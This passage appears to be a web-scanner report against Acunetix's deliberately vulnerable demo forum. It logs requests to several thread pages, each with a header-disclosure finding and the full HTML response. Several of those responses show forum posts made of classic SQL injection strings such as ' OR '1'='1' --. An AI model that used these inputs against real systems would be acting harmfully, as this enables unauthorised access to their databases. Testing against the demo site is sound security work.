style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers 